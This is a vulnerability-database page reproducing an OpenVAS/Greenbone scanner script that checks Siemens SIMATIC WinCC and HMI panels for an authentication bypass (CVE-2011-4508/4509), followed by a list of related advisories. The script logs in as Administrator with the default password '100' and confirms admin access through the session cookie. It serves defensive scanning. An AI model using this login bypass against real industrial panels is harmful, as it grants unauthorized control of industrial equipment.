| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| Siemens WinCC and SIMATIC HMI Panels < 11.0.2.1 Authentication Bypass | 8 May 201900:00 | – | nessus | |
| Siemens WinCC and SIMATIC HMI Panels Default Password | 8 May 201900:00 | – | nessus | |
| Siemens WinCC and SIMATIC HMI Panels < 11.0.2.1 Multiple Vulnerabilities | 8 May 201900:00 | – | nessus | |
| CVE-2011-4508 | 3 Feb 201220:00 | – | cve | |
| CVE-2011-4509 | 3 Feb 201220:00 | – | cve | |
| CVE-2011-4508 | 3 Feb 201220:00 | – | cvelist | |
| CVE-2011-4509 | 3 Feb 201220:00 | – | cvelist | |
| EUVD-2011-4434 | 7 Oct 202500:30 | – | euvd | |
| EUVD-2011-4435 | 7 Oct 202500:30 | – | euvd | |
| Siemens Simatic HMI Authentication Vulnerabilities | 24 Sep 201106:00 | – | ics |
# SPDX-FileCopyrightText: 2011 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.103372");
script_cve_id("CVE-2011-4508", "CVE-2011-4509");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_version("2023-07-28T05:05:23+0000");
script_name("Multiple Siemens SIMATIC Products Authentication Bypass Vulnerabilities");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/51177");
script_xref(name:"URL", value:"http://xs-sniper.com/blog/2011/12/20/the-siemens-simatic-remote-authentication-bypass-that-doesnt-exist/");
script_xref(name:"URL", value:"http://www.us-cert.gov/control_systems/pdf/ICSA-11-356-01.pdf");
script_tag(name:"last_modification", value:"2023-07-28 05:05:23 +0000 (Fri, 28 Jul 2023)");
script_tag(name:"creation_date", value:"2011-12-23 10:42:29 +0100 (Fri, 23 Dec 2011)");
script_tag(name:"qod_type", value:"remote_vul");
script_category(ACT_ATTACK);
script_family("Web application abuses");
script_copyright("Copyright (C) 2011 Greenbone AG");
script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_tag(name:"summary", value:"Multiple Siemens SIMATIC products are affected by vulnerabilities that
allow attackers to bypass authentication.");
script_tag(name:"impact", value:"An attacker can exploit these issues to bypass intended security
restrictions and gain access to the affected application. Successfully
exploiting these issues may lead to further attacks.");
script_tag(name:"affected", value:"SIMATIC WinCC Flexible 2004 through 2008 SP2 SIMATIC WinCC V11,
V11 SP1, and V11 SP2 SIMATIC HMI TP, OP, MP, Mobile, and Comfort Series Panels");
script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release,
disable respective features, remove the product or replace the product by another one.");
script_tag(name:"solution_type", value:"WillNotFix");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("host_details.inc");
port = http_get_port(default:80);
host = http_host_name(port:port);
foreach dir (make_list("/", "/www/")) {
url = string(dir,"start.html");
buf = http_get_cache(item:url, port:port);
if(!buf)
continue;
if("miniweb" >< tolower(buf)) {
req = string(
"POST ",dir,"FormLogin HTTP/1.1\r\n",
"Host: ",host,"\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Referer: http://",host,"/start.html\r\n",
"Content-Type: application/x-www-form-urlencoded\r\n",
"Content-Length: 58\r\n",
"\r\n",
"Login=Administrator&Redirection=%2Fstart.html&Password=100\r\n\r\n");
result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
if("Auth Form Response" >< result) {
start = eregmatch(string:result, pattern:'url=([^"]+)');
if(isnull(start[1]))continue;
co = eregmatch(string:result, pattern:"Set-cookie: ([^,]+)");
if(isnull(co[1]))continue;
cookie = co[1];
url = string(start[1]);
req = string("GET ", url, " HTTP/1.1\r\n",
"Host: ",host,"\r\n",
"Cookie: ",cookie," path=/\r\n",
"\r\n");
buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
if(!buf) continue;
if("You are logged in" >< buf && "Welcome Administrator" >< buf) {
security_message(port:port);
exit(0);
}
}
}
}
exit(0);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation